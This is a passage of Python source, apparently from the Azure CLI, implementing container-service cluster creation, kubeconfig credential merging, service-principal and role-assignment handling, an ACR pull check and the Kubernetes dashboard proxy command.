identity = msi_client.user_assigned_identities.get(resource_group_name=resource_group_name,
resource_name=identity_name)
except CloudError as ex:
if 'was not found' in ex.message:
raise ResourceNotFoundError("Identity {} not found.".format(resource_id))
raise ClientRequestError(ex.message)
return identity.client_id
raise InvalidArgumentValueError("Cannot parse identity name from provided resource id {}.".format(resource_id))
# pylint: disable=too-many-locals
def acs_create(cmd, client, resource_group_name, deployment_name, name, ssh_key_value, dns_name_prefix=None,
location=None, admin_username="azureuser", api_version=None, master_profile=None,
master_vm_size="Standard_D2_v2", master_osdisk_size=0, master_count=1, master_vnet_subnet_id="",
master_first_consecutive_static_ip="10.240.255.5", master_storage_profile="",
agent_profiles=None, agent_vm_size="Standard_D2_v2", agent_osdisk_size=0,
agent_count=3, agent_vnet_subnet_id="", agent_ports=None, agent_storage_profile="",
orchestrator_type="DCOS", orchestrator_version="", service_principal=None, client_secret=None, tags=None,
windows=False, admin_password="", generate_ssh_keys=False, # pylint: disable=unused-argument
validate=False, no_wait=False):
"""Create a new Acs.
:param resource_group_name: The name of the resource group. The name
is case insensitive.
:type resource_group_name: str
:param deployment_name: The name of the deployment.
:type deployment_name: str
:param dns_name_prefix: Sets the Domain name prefix for the cluster.
The concatenation of the domain name and the regionalized DNS zone
make up the fully qualified domain name associated with the public
IP address.
:type dns_name_prefix: str
:param name: Resource name for the container service.
:type name: str
:param ssh_key_value: Configure all linux machines with the SSH RSA
public key string. Your key should include three parts, for example
    'ssh-rsa AAAAB...snip...UcyupgH azureuser@linuxvm'.
:type ssh_key_value: str
:param content_version: If included it must match the ContentVersion
in the template.
:type content_version: str
:param admin_username: User name for the Linux Virtual Machines.
:type admin_username: str
:param api_version: ACS API version to use
:type api_version: str
:param master_profile: MasterProfile used to describe master pool
:type master_profile: dict
:param master_vm_size: The size of master pool Virtual Machine
:type master_vm_size: str
:param master_osdisk_size: The osDisk size in GB of master pool Virtual Machine
:type master_osdisk_size: int
:param master_count: The number of masters for the cluster.
:type master_count: int
:param master_vnet_subnet_id: The vnet subnet id for master pool
:type master_vnet_subnet_id: str
:param master_storage_profile: The storage profile used for master pool.
Possible value could be StorageAccount, ManagedDisk.
:type master_storage_profile: str
:param agent_profiles: AgentPoolProfiles used to describe agent pools
:type agent_profiles: dict
:param agent_vm_size: The size of the Virtual Machine.
:type agent_vm_size: str
:param agent_osdisk_size: The osDisk size in GB of agent pool Virtual Machine
:type agent_osdisk_size: int
    :param agent_vnet_subnet_id: The vnet subnet id for the agent pool
:type agent_vnet_subnet_id: str
:param agent_ports: the ports exposed on the agent pool
:type agent_ports: list
:param agent_storage_profile: The storage profile used for agent pool.
Possible value could be StorageAccount, ManagedDisk.
:type agent_storage_profile: str
:param location: Location for VM resources.
:type location: str
:param orchestrator_type: The type of orchestrator used to manage the
applications on the cluster.
:type orchestrator_type: str or :class:`orchestratorType
<Default.models.orchestratorType>`
:param tags: Tags object.
:type tags: object
    :param windows: If true, the cluster will be built for running Windows containers.
:type windows: bool
    :param admin_password: The administration password for Windows nodes. Only available if --windows=true
:type admin_password: str
:param bool raw: returns the direct response alongside the
deserialized response
:rtype:
:class:`AzureOperationPoller<msrestazure.azure_operation.AzureOperationPoller>`
instance that returns :class:`DeploymentExtended
<Default.models.DeploymentExtended>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
if ssh_key_value is not None and not is_valid_ssh_rsa_public_key(ssh_key_value):
raise CLIError('Provided ssh key ({}) is invalid or non-existent'.format(ssh_key_value))
subscription_id = get_subscription_id(cmd.cli_ctx)
if not dns_name_prefix:
dns_name_prefix = _get_default_dns_prefix(name, resource_group_name, subscription_id)
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
if location is None:
location = rg_location
# if api-version is not specified, or specified in a version not supported
# override based on location
if api_version is None or api_version not in ["2017-01-31", "2017-07-01"]:
if location in regions_in_preview:
api_version = "2017-07-01" # 2017-07-01 supported in the preview locations
else:
api_version = "2017-01-31" # 2017-01-31 applied to other locations
if orchestrator_type.lower() == 'kubernetes':
principal_obj = _ensure_service_principal(cmd.cli_ctx, service_principal, client_secret, subscription_id,
dns_name_prefix, location, name)
client_secret = principal_obj.get("client_secret")
service_principal = principal_obj.get("service_principal")
elif windows:
raise CLIError('--windows is only supported for Kubernetes clusters')
# set location if void
if not location:
location = '[resourceGroup().location]'
# set os_type
os_type = 'Linux'
if windows:
os_type = 'Windows'
# set agent_ports if void
if not agent_ports:
agent_ports = []
# get windows_profile
windows_profile = _generate_windows_profile(windows, admin_username, admin_password)
    # The resources.properties fields should match the ContainerService API model
master_pool_profile = _generate_master_pool_profile(api_version, master_profile, master_count, dns_name_prefix,
master_vm_size, master_osdisk_size, master_vnet_subnet_id,
master_first_consecutive_static_ip, master_storage_profile)
agent_pool_profiles = _generate_agent_pool_profiles(api_version, agent_profiles, agent_count, dns_name_prefix,
agent_vm_size, os_type, agent_osdisk_size, agent_vnet_subnet_id,
agent_ports, agent_storage_profile)
outputs = _generate_outputs(name, orchestrator_type, admin_username)
properties = _generate_properties(api_version, orchestrator_type, orchestrator_version, master_pool_profile,
agent_pool_profiles, ssh_key_value, admin_username, windows_profile)
resource = {
"apiVersion": api_version,
"location": location,
"type": "Microsoft.ContainerService/containerServices",
"name": name,
"tags": tags,
"properties": properties,
}
template = {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"resources": [
resource,
],
"outputs": outputs,
}
params = {}
if service_principal is not None and client_secret is not None:
properties["servicePrincipalProfile"] = {
"clientId": service_principal,
"secret": "[parameters('clientSecret')]",
}
template["parameters"] = {
"clientSecret": {
"type": "secureString",
"metadata": {
"description": "The client secret for the service principal"
}
}
}
params = {
"clientSecret": {
"value": client_secret
}
}
# Due to SPN replication latency, we do a few retries here
max_retry = 30
retry_exception = Exception(None)
for _ in range(0, max_retry):
try:
return _invoke_deployment(cmd, resource_group_name, deployment_name,
template, params, validate, no_wait)
except CloudError as ex:
retry_exception = ex
if 'is not valid according to the validation procedure' in ex.message or \
'The credentials in ServicePrincipalProfile were invalid' in ex.message or \
'not found in Active Directory tenant' in ex.message:
time.sleep(3)
else:
raise ex
raise retry_exception
def store_acs_service_principal(subscription_id, client_secret, service_principal,
file_name='acsServicePrincipal.json'):
obj = {}
if client_secret:
obj['client_secret'] = client_secret
if service_principal:
obj['service_principal'] = service_principal
config_path = os.path.join(get_config_dir(), file_name)
full_config = load_service_principals(config_path=config_path)
if not full_config:
full_config = {}
full_config[subscription_id] = obj
with os.fdopen(os.open(config_path, os.O_RDWR | os.O_CREAT | os.O_TRUNC, 0o600),
'w+') as spFile:
json.dump(full_config, spFile)
def load_acs_service_principal(subscription_id, file_name='acsServicePrincipal.json'):
config_path = os.path.join(get_config_dir(), file_name)
config = load_service_principals(config_path)
if not config:
return None
return config.get(subscription_id)
def load_service_principals(config_path):
if not os.path.exists(config_path):
return None
fd = os.open(config_path, os.O_RDONLY)
try:
with os.fdopen(fd) as f:
return shell_safe_json_parse(f.read())
except: # pylint: disable=bare-except
return None
def _invoke_deployment(cmd, resource_group_name, deployment_name, template, parameters, validate, no_wait,
subscription_id=None):
from azure.cli.core.profiles import ResourceType
DeploymentProperties = cmd.get_models('DeploymentProperties', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
properties = DeploymentProperties(template=template, parameters=parameters, mode='incremental')
smc = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES,
subscription_id=subscription_id).deployments
if validate:
logger.info('==== BEGIN TEMPLATE ====')
logger.info(json.dumps(template, indent=2))
logger.info('==== END TEMPLATE ====')
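    # Resource API versions 2019-10-01 and later expect the properties wrapped in a
    # Deployment model; older API versions accept the DeploymentProperties object directly.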
if cmd.supported_api_version(min_api='2019-10-01', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES):
Deployment = cmd.get_models('Deployment', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
deployment = Deployment(properties=properties)
if validate:
validation_poller = smc.validate(resource_group_name, deployment_name, deployment)
return LongRunningOperation(cmd.cli_ctx)(validation_poller)
return sdk_no_wait(no_wait, smc.create_or_update, resource_group_name, deployment_name, deployment)
if validate:
return smc.validate(resource_group_name, deployment_name, properties)
return sdk_no_wait(no_wait, smc.create_or_update, resource_group_name, deployment_name, properties)
def k8s_get_credentials(cmd, client, name, resource_group_name,
path=os.path.join(os.path.expanduser('~'), '.kube', 'config'),
ssh_key_file=None,
overwrite_existing=False):
"""Download and install kubectl credentials from the cluster master
:param name: The name of the cluster.
:type name: str
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param path: Where to install the kubectl config file
:type path: str
:param ssh_key_file: Path to an SSH key file to use
:type ssh_key_file: str
"""
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
_k8s_get_credentials_internal(name, acs_info, path, ssh_key_file, overwrite_existing)
def _k8s_get_credentials_internal(name, acs_info, path, ssh_key_file, overwrite_existing):
if ssh_key_file is not None and not os.path.isfile(ssh_key_file):
raise CLIError('Private key file {} does not exist'.format(ssh_key_file))
dns_prefix = acs_info.master_profile.dns_prefix # pylint: disable=no-member
location = acs_info.location # pylint: disable=no-member
user = acs_info.linux_profile.admin_username # pylint: disable=no-member
_mkdir_p(os.path.dirname(path))
path_candidate = path
ix = 0
while os.path.exists(path_candidate):
ix += 1
path_candidate = '{}-{}-{}'.format(path, name, ix)
# TODO: this only works for public cloud, need other casing for national clouds
acs_client.secure_copy(user, '{}.{}.cloudapp.azure.com'.format(dns_prefix, location),
'.kube/config', path_candidate, key_filename=ssh_key_file)
# merge things
if path_candidate != path:
try:
merge_kubernetes_configurations(path, path_candidate, overwrite_existing)
except yaml.YAMLError as exc:
logger.warning('Failed to merge credentials to kube config file: %s', exc)
logger.warning('The credentials have been saved to %s', path_candidate)
def _handle_merge(existing, addition, key, replace):
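    # Merge the entries of addition[key] (clusters/users/contexts) into existing[key]:
    # a same-named entry is replaced when `replace` is set or the entries are identical;
    # otherwise the user is prompted, and the merge fails if they decline or there is no TTY.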
if not addition.get(key, False):
return
if not existing.get(key):
existing[key] = addition[key]
return
for i in addition[key]:
for j in existing[key]:
if not i.get('name', False) or not j.get('name', False):
continue
if i['name'] == j['name']:
if replace or i == j:
existing[key].remove(j)
else:
msg = 'A different object named {} already exists in your kubeconfig file.\nOverwrite?'
overwrite = False
try:
overwrite = prompt_y_n(msg.format(i['name']))
except NoTTYException:
pass
if overwrite:
existing[key].remove(j)
else:
msg = 'A different object named {} already exists in {} in your kubeconfig file.'
raise CLIError(msg.format(i['name'], key))
existing[key].append(i)
def load_kubernetes_configuration(filename):
try:
with open(filename) as stream:
return yaml.safe_load(stream)
except (IOError, OSError) as ex:
if getattr(ex, 'errno', 0) == errno.ENOENT:
raise CLIError('{} does not exist'.format(filename))
raise
except (yaml.parser.ParserError, UnicodeDecodeError) as ex:
raise CLIError('Error parsing {} ({})'.format(filename, str(ex)))
def merge_kubernetes_configurations(existing_file, addition_file, replace, context_name=None):
    existing = load_kubernetes_configuration(existing_file)
    addition = load_kubernetes_configuration(addition_file)
    # bail out early if the additional configuration could not be loaded, before it is dereferenced
    if addition is None:
        raise CLIError('failed to load additional configuration from {}'.format(addition_file))
    if context_name is not None:
        addition['contexts'][0]['name'] = context_name
        addition['contexts'][0]['context']['cluster'] = context_name
        addition['clusters'][0]['name'] = context_name
        addition['current-context'] = context_name
    # rename the admin context so it doesn't overwrite the user context
    for ctx in addition.get('contexts', []):
        try:
            if ctx['context']['user'].startswith('clusterAdmin'):
                admin_name = ctx['name'] + '-admin'
                addition['current-context'] = ctx['name'] = admin_name
                break
        except (KeyError, TypeError):
            continue
if existing is None:
existing = addition
else:
_handle_merge(existing, addition, 'clusters', replace)
_handle_merge(existing, addition, 'users', replace)
_handle_merge(existing, addition, 'contexts', replace)
existing['current-context'] = addition['current-context']
# check that ~/.kube/config is only read- and writable by its owner
if platform.system() != 'Windows':
existing_file_perms = "{:o}".format(stat.S_IMODE(os.lstat(existing_file).st_mode))
if not existing_file_perms.endswith('600'):
logger.warning('%s has permissions "%s".\nIt should be readable and writable only by its owner.',
existing_file, existing_file_perms)
with open(existing_file, 'w+') as stream:
yaml.safe_dump(existing, stream, default_flow_style=False)
current_context = addition.get('current-context', 'UNKNOWN')
msg = 'Merged "{}" as current context in {}'.format(current_context, existing_file)
print(msg)
def _get_host_name(acs_info):
"""
Gets the FQDN from the acs_info object.
:param acs_info: ContainerService object from Azure REST API
:type acs_info: ContainerService
"""
if acs_info is None:
raise CLIError('Missing acs_info')
if acs_info.master_profile is None:
raise CLIError('Missing master_profile')
if acs_info.master_profile.fqdn is None:
raise CLIError('Missing fqdn')
return acs_info.master_profile.fqdn
def _get_username(acs_info):
"""
Gets the admin user name from the Linux profile of the ContainerService object.
:param acs_info: ContainerService object from Azure REST API
:type acs_info: ContainerService
"""
if acs_info.linux_profile is not None:
return acs_info.linux_profile.admin_username
return None
def _get_acs_info(cli_ctx, name, resource_group_name):
"""
Gets the ContainerService object from Azure REST API.
:param name: ACS resource name
:type name: String
:param resource_group_name: Resource group name
:type resource_group_name: String
"""
container_services = cf_container_services(cli_ctx, None)
return container_services.get(resource_group_name, name)
def _rand_str(n):
"""
Gets a random string
"""
choices = string.ascii_lowercase + string.digits
return ''.join(random.SystemRandom().choice(choices) for _ in range(n))
def _mkdir_p(path):
# http://stackoverflow.com/a/600612
try:
os.makedirs(path)
except OSError as exc: # Python >2.5
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
def update_acs(cmd, client, resource_group_name, container_service_name, new_agent_count):
instance = client.get(resource_group_name, container_service_name)
instance.agent_pool_profiles[0].count = new_agent_count # pylint: disable=no-member
# null out the service principal because otherwise validation complains
if instance.orchestrator_profile.orchestrator_type == ContainerServiceOrchestratorTypes.kubernetes:
instance.service_principal_profile = None
# null out the windows profile so that validation doesn't complain about not having the admin password
instance.windows_profile = None
return client.create_or_update(resource_group_name, container_service_name, instance)
def list_container_services(cmd, client, resource_group_name=None):
''' List Container Services. '''
svc_list = client.list_by_resource_group(resource_group_name=resource_group_name) \
if resource_group_name else client.list()
return list(svc_list)
def show_service_principal(client, identifier):
object_id = _resolve_service_principal(client, identifier)
return client.get(object_id)
def _resolve_service_principal(client, identifier):
# todo: confirm with graph team that a service principal name must be unique
result = list(client.list(filter="servicePrincipalNames/any(c:c eq '{}')".format(identifier)))
if result:
return result[0].object_id
try:
uuid.UUID(identifier)
return identifier # assume an object id
except ValueError:
raise CLIError("service principal '{}' doesn't exist".format(identifier))
def create_application(client, display_name, homepage, identifier_uris,
available_to_other_tenants=False, password=None, reply_urls=None,
key_value=None, key_type=None, key_usage=None, start_date=None,
end_date=None, required_resource_accesses=None):
from azure.graphrbac.models import GraphErrorException
password_creds, key_creds = _build_application_creds(password, key_value, key_type,
key_usage, start_date, end_date)
app_create_param = ApplicationCreateParameters(available_to_other_tenants=available_to_other_tenants,
display_name=display_name,
identifier_uris=identifier_uris,
homepage=homepage,
reply_urls=reply_urls,
key_credentials=key_creds,
password_credentials=password_creds,
required_resource_access=required_resource_accesses)
try:
result = client.create(app_create_param, raw=True)
return result.output, result.response.headers["ocp-aad-session-key"]
except GraphErrorException as ex:
if 'insufficient privileges' in str(ex).lower():
link = 'https://docs.microsoft.com/azure/azure-resource-manager/resource-group-create-service-principal-portal' # pylint: disable=line-too-long
raise CLIError("Directory permission is needed for the current user to register the application. "
"For how to configure, please refer '{}'. Original error: {}".format(link, ex))
raise
def update_application(client, object_id, display_name, homepage, identifier_uris,
available_to_other_tenants=False, password=None, reply_urls=None,
key_value=None, key_type=None, key_usage=None, start_date=None,
end_date=None, required_resource_accesses=None):
from azure.graphrbac.models import GraphErrorException
password_creds, key_creds = _build_application_creds(password, key_value, key_type,
key_usage, start_date, end_date)
try:
if key_creds:
client.update_key_credentials(object_id, key_creds)
if password_creds:
client.update_password_credentials(object_id, password_creds)
if reply_urls:
client.patch(object_id, ApplicationUpdateParameters(reply_urls=reply_urls))
return
except GraphErrorException as ex:
if 'insufficient privileges' in str(ex).lower():
link = 'https://docs.microsoft.com/azure/azure-resource-manager/resource-group-create-service-principal-portal' # pylint: disable=line-too-long
raise CLIError("Directory permission is needed for the current user to register the application. "
"For how to configure, please refer '{}'. Original error: {}".format(link, ex))
raise
def _build_application_creds(password=None, key_value=None, key_type=None,
key_usage=None, start_date=None, end_date=None):
if password and key_value:
raise CLIError('specify either --password or --key-value, but not both.')
if not start_date:
start_date = datetime.datetime.utcnow()
elif isinstance(start_date, str):
start_date = dateutil.parser.parse(start_date)
if not end_date:
end_date = start_date + relativedelta(years=1)
elif isinstance(end_date, str):
end_date = dateutil.parser.parse(end_date)
key_type = key_type or 'AsymmetricX509Cert'
key_usage = key_usage or 'Verify'
password_creds = None
key_creds = None
if password:
password_creds = [PasswordCredential(start_date=start_date, end_date=end_date,
key_id=str(uuid.uuid4()), value=password)]
elif key_value:
key_creds = [KeyCredential(start_date=start_date, end_date=end_date, value=key_value,
key_id=str(uuid.uuid4()), usage=key_usage, type=key_type)]
return (password_creds, key_creds)
def create_service_principal(cli_ctx, identifier, resolve_app=True, rbac_client=None):
if rbac_client is None:
rbac_client = get_graph_rbac_management_client(cli_ctx)
if resolve_app:
try:
uuid.UUID(identifier)
result = list(rbac_client.applications.list(filter="appId eq '{}'".format(identifier)))
except ValueError:
result = list(rbac_client.applications.list(
filter="identifierUris/any(s:s eq '{}')".format(identifier)))
if not result: # assume we get an object id
result = [rbac_client.applications.get(identifier)]
app_id = result[0].app_id
else:
app_id = identifier
return rbac_client.service_principals.create(ServicePrincipalCreateParameters(app_id=app_id, account_enabled=True))
def create_role_assignment(cli_ctx, role, assignee, is_service_principal, resource_group_name=None, scope=None):
return _create_role_assignment(cli_ctx,
role, assignee, resource_group_name,
scope, resolve_assignee=is_service_principal)
def _create_role_assignment(cli_ctx, role, assignee,
resource_group_name=None, scope=None, resolve_assignee=True):
from azure.cli.core.profiles import ResourceType, get_sdk
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
definitions_client = factory.role_definitions
scope = _build_role_scope(resource_group_name, scope, assignments_client.config.subscription_id)
role_id = _resolve_role_id(role, scope, definitions_client)
# If the cluster has service principal resolve the service principal client id to get the object id,
# if not use MSI object id.
object_id = _resolve_object_id(cli_ctx, assignee) if resolve_assignee else assignee
RoleAssignmentCreateParameters = get_sdk(cli_ctx, ResourceType.MGMT_AUTHORIZATION,
'RoleAssignmentCreateParameters', mod='models',
operation_group='role_assignments')
parameters = RoleAssignmentCreateParameters(role_definition_id=role_id, principal_id=object_id)
assignment_name = uuid.uuid4()
custom_headers = None
return assignments_client.create(scope, assignment_name, parameters, custom_headers=custom_headers)
def _build_role_scope(resource_group_name, scope, subscription_id):
subscription_scope = '/subscriptions/' + subscription_id
if scope:
if resource_group_name:
err = 'Resource group "{}" is redundant because scope is supplied'
raise CLIError(err.format(resource_group_name))
elif resource_group_name:
scope = subscription_scope + '/resourceGroups/' + resource_group_name
else:
scope = subscription_scope
return scope
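# Illustrative example (hypothetical values, not from the original source):
#   _build_role_scope('my-rg', None, '00000000-0000-0000-0000-000000000000')
#   -> '/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/my-rg'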
def _resolve_role_id(role, scope, definitions_client):
role_id = None
try:
uuid.UUID(role)
role_id = role
except ValueError:
pass
if not role_id: # retrieve role id
role_defs = list(definitions_client.list(scope, "roleName eq '{}'".format(role)))
if not role_defs:
raise CLIError("Role '{}' doesn't exist.".format(role))
if len(role_defs) > 1:
ids = [r.id for r in role_defs]
err = "More than one role matches the given name '{}'. Please pick a value from '{}'"
raise CLIError(err.format(role, ids))
role_id = role_defs[0].id
return role_id
def _resolve_object_id(cli_ctx, assignee):
client = get_graph_rbac_management_client(cli_ctx)
result = None
if assignee.find('@') >= 0: # looks like a user principal name
result = list(client.users.list(filter="userPrincipalName eq '{}'".format(assignee)))
if not result:
result = list(client.service_principals.list(
filter="servicePrincipalNames/any(c:c eq '{}')".format(assignee)))
if not result: # assume an object id, let us verify it
result = _get_object_stubs(client, [assignee])
# 2+ matches should never happen, so we only check 'no match' here
if not result:
raise CLIError("No matches in graph database for '{}'".format(assignee))
return result[0].object_id
def _get_object_stubs(graph_client, assignees):
params = GetObjectsParameters(include_directory_object_references=True,
object_ids=assignees)
return list(graph_client.objects.get_objects_by_object_ids(params))
def _update_dict(dict1, dict2):
cp = dict1.copy()
cp.update(dict2)
return cp
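# Illustrative example (not part of the original source):
#   _update_dict({'count': 3, 'osType': 'Linux'}, {'count': 5})
#   -> {'count': 5, 'osType': 'Linux'}  (dict2 wins on conflicts; neither input is mutated)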
def subnet_role_assignment_exists(cli_ctx, scope):
network_contributor_role_id = "4d97b98b-1d4f-4787-a291-c67834d212e7"
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
for i in assignments_client.list_for_scope(scope=scope, filter='atScope()'):
if i.scope == scope and i.role_definition_id.endswith(network_contributor_role_id):
return True
return False
def aks_check_acr(cmd, client, resource_group_name, name, acr):
if not which("kubectl"):
raise ValidationError("Can not find kubectl executable in PATH")
_, browse_path = tempfile.mkstemp()
aks_get_credentials(
cmd, client, resource_group_name, name, admin=False, path=browse_path
)
# Get kubectl minor version
kubectl_minor_version = -1
try:
cmd = f"kubectl version -o json --kubeconfig {browse_path}"
output = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
jsonS, _ = output.communicate()
kubectl_version = json.loads(jsonS)
kubectl_minor_version = int(kubectl_version["clientVersion"]["minor"])
kubectl_server_minor_version = int(kubectl_version["serverVersion"]["minor"])
kubectl_server_patch = int(kubectl_version["serverVersion"]["gitVersion"].split(".")[-1])
if kubectl_server_minor_version < 17 or (kubectl_server_minor_version == 17 and kubectl_server_patch < 14):
            logger.warning('There is a known issue for Kubernetes versions < 1.17.14 when connecting to '
                           'ACR using MSI. See https://github.com/kubernetes/kubernetes/pull/96355 for '
                           'more information.')
except subprocess.CalledProcessError as err:
raise ValidationError("Could not find kubectl minor version: {}".format(err))
if kubectl_minor_version == -1:
raise ValidationError("Failed to get kubectl version")
podName = "canipull-" + str(uuid.uuid4())
overrides = {
"spec": {
"restartPolicy": "Never",
"hostNetwork": True,
"containers": [
{
"securityContext": {"runAsUser": 0},
"name": podName,
"image": CONST_CANIPULL_IMAGE,
"args": ["-v6", acr],
"stdin": True,
"stdinOnce": True,
"tty": True,
"volumeMounts": [
{"name": "azurejson", "mountPath": "/etc/kubernetes"},
{"name": "sslcerts", "mountPath": "/etc/ssl/certs"},
],
}
],
"tolerations": [
{"key": "CriticalAddonsOnly", "operator": "Exists"},
{"effect": "NoExecute", "operator": "Exists"},
],
"volumes": [
{"name": "azurejson", "hostPath": {"path": "/etc/kubernetes"}},
{"name": "sslcerts", "hostPath": {"path": "/etc/ssl/certs"}},
],
}
}
try:
cmd = [
"kubectl",
"run",
"--kubeconfig",
browse_path,
"--rm",
"--quiet",
"--image",
CONST_CANIPULL_IMAGE,
"--overrides",
json.dumps(overrides),
"-it",
podName,
]
        # Support kubectl versions < 1.18
if kubectl_minor_version < 18:
cmd += ["--generator=run-pod/v1"]
output = subprocess.check_output(
cmd,
universal_newlines=True,
)
except subprocess.CalledProcessError as err:
raise CLIError("Failed to check the ACR: {}".format(err))
if output:
print(output)
else:
raise CLIError("Failed to check the ACR.")
# pylint: disable=too-many-statements,too-many-branches
def aks_browse(cmd, client, resource_group_name, name, disable_browser=False,
listen_address='127.0.0.1', listen_port='8001'):
# verify the kube-dashboard addon was not disabled
instance = client.get(resource_group_name, name)
addon_profiles = instance.addon_profiles or {}
# addon name is case insensitive
addon_profile = next((addon_profiles[k] for k in addon_profiles
if k.lower() == CONST_KUBE_DASHBOARD_ADDON_NAME.lower()),
ManagedClusterAddonProfile(enabled=False))
# open portal view if addon is not enabled or k8s version >= 1.19.0
if StrictVersion(instance.kubernetes_version) >= StrictVersion('1.19.0') or (not addon_profile.enabled):
subscription_id = get_subscription_id(cmd.cli_ctx)
dashboardURL = (
cmd.cli_ctx.cloud.endpoints.portal + # Azure Portal URL (https://portal.azure.com for public cloud)
('/#resource/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.ContainerService'
'/managedClusters/{2}/workloads').format(subscription_id, resource_group_name, name)
)
if in_cloud_console():
logger.warning('To view the Kubernetes resources view, please open %s in a new tab', dashboardURL)
else:
logger.warning('Kubernetes resources view on %s', dashboardURL)
if not disable_browser:
webbrowser.open_new_tab(dashboardURL)
return
# otherwise open the kube-dashboard addon
if not which('kubectl'):
        raise CLIError('Cannot find kubectl executable in PATH')
_, browse_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name, name, admin=False, path=browse_path)
# find the dashboard pod's name
try:
dashboard_pod = subprocess.check_output(
["kubectl", "get", "pods", "--kubeconfig", browse_path, "--namespace", "kube-system",
"--output", "name", "--selector", "k8s-app=kubernetes-dashboard"],
universal_newlines=True)
except subprocess.CalledProcessError as err:
raise CLIError('Could not find dashboard pod: {}'.format(err))
if dashboard_pod:
# remove any "pods/" or "pod/" prefix from the name
dashboard_pod = str(dashboard_pod).split('/')[-1].strip()
else:
raise CLIError("Couldn't find the Kubernetes dashboard pod.")
# find the port
try:
dashboard_port = subprocess.check_output(
["kubectl", "get", "pods", "--kubeconfig", browse_path, "--namespace", "kube-system",
"--selector", "k8s-app=kubernetes-dashboard",
"--output", "jsonpath='{.items[0].spec.containers[0].ports[0].containerPort}'"]
)
# output format: b"'{port}'"
dashboard_port = int((dashboard_port.decode('utf-8').replace("'", "")))
except subprocess.CalledProcessError as err:
raise CLIError('Could not find dashboard port: {}'.format(err))
# use https if dashboard container is using https
if dashboard_port == 8443:
protocol = 'https'
else:
protocol = 'http'
proxy_url = 'http://{0}:{1}/'.format(listen_address, listen_port)
dashboardURL = '{0}/api/v1/namespaces/kube-system/services/{1}:kubernetes-dashboard:/proxy/'.format(proxy_url,
protocol)
# launch kubectl port-forward locally to access the remote dashboard
if in_cloud_console():
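        # In Cloud Shell there is no local browser; ask the console's helper service on
        # localhost:8888 to open the port and use the public URL it returns instead.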
# TODO: better error handling here.
response = requests.post('http://localhost:8888/openport/{0}'.format(listen_port))
result = json.loads(response.text)
dashboardURL = '{0}api/v1/namespaces/kube-system/services/{1}:kubernetes-dashboard:/proxy/'.format(
result['url'], protocol)
term_id = os.environ.get('ACC_TERM_ID')
if term_id:
response = requests.post('http://localhost:8888/openLink/{0}'.format(term_id),
json={"url": dashboardURL})
logger.warning('To view the console, please open %s in a new tab', dashboardURL)
else:
logger.warning('Proxy running on %s', proxy_url)
logger.warning('Press CTRL+C to close the tunnel...')
if not disable_browser:
wait_then_open_async(dashboardURL)
try:
try:
subprocess.check_output(["kubectl", "--kubeconfig", browse_path, "proxy", "--address",
listen_address, "--port", listen_port], stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as err:
            if err.output.find(b'unknown flag: --address') != -1:
if listen_address != '127.0.0.1':
logger.warning('"--address" is only supported in kubectl v1.13 and later.')
logger.warning('The "--listen-address" argument will be ignored.')
subprocess.call(["kubectl", "--kubeconfig", browse_path, "proxy", "--port", listen_port])
except KeyboardInterrupt:
# Let command processing finish gracefully after the user presses [Ctrl+C]
pass
finally:
if in_cloud_console():
requests.post('http://localhost:8888/closeport/8001')
def _trim_nodepoolname(nodepool_name):
if not nodepool_name:
return "nodepool1"
return nodepool_name[:12]
def _validate_ssh_key(no_ssh_key, ssh_key_value):
if not no_ssh_key:
try:
if not ssh_key_value or not is_valid_ssh_rsa_public_key(ssh_key_value):
raise ValueError()
except (TypeError, ValueError):
shortened_key = truncate_text(ssh_key_value)
raise CLIError('Provided ssh key ({}) is invalid or non-existent'.format(shortened_key))
def _add_monitoring_role_assignment(result, cluster_resource_id, cmd):
service_principal_msi_id = None
# Check if service principal exists, if it does, assign permissions to service principal
# Else, provide permissions to MSI
if (
hasattr(result, 'service_principal_profile') and
hasattr(result.service_principal_profile, 'client_id') and
result.service_principal_profile.client_id.lower() != 'msi'
):
logger.info('valid service principal exists, using it')
service_principal_msi_id = result.service_principal_profile.client_id
is_service_principal = True
elif (
(hasattr(result, 'addon_profiles')) and
(CONST_MONITORING_ADDON_NAME in result.addon_profiles) and
(hasattr(result.addon_profiles[CONST_MONITORING_ADDON_NAME], 'identity')) and
(hasattr(result.addon_profiles[CONST_MONITORING_ADDON_NAME].identity, 'object_id'))
):
logger.info('omsagent MSI exists, using it')
service_principal_msi_id = result.addon_profiles[CONST_MONITORING_ADDON_NAME].identity.object_id
is_service_principal = False
if service_principal_msi_id is not None:
if not _add_role_assignment(cmd.cli_ctx, 'Monitoring Metrics Publisher',
service_principal_msi_id, is_service_principal, scope=cluster_resource_id):
logger.warning('Could not create a role assignment for Monitoring addon. '
'Are you an Owner on this subscription?')
else:
        logger.warning('Could not find service principal or user assigned MSI for role '
                       'assignment')
def _add_ingress_appgw_addon_role_assignment(result, cmd):
service_principal_msi_id = None
# Check if service principal exists, if it does, assign permissions to service principal
# Else, provide permissions to MSI
if (
hasattr(result, 'service_principal_profile') and
hasattr(result.service_principal_profile, 'client_id') and
result.service_principal_profile.client_id != 'msi'
):
service_principal_msi_id = result.service_principal_profile.client_id
is_service_principal = True
elif (
(hasattr(result, 'addon_profiles')) and
(CONST_INGRESS_APPGW_ADDON_NAME in result.addon_profiles) and
(hasattr(result.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME], 'identity')) and
(hasattr(result.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].identity, 'object_id'))
):
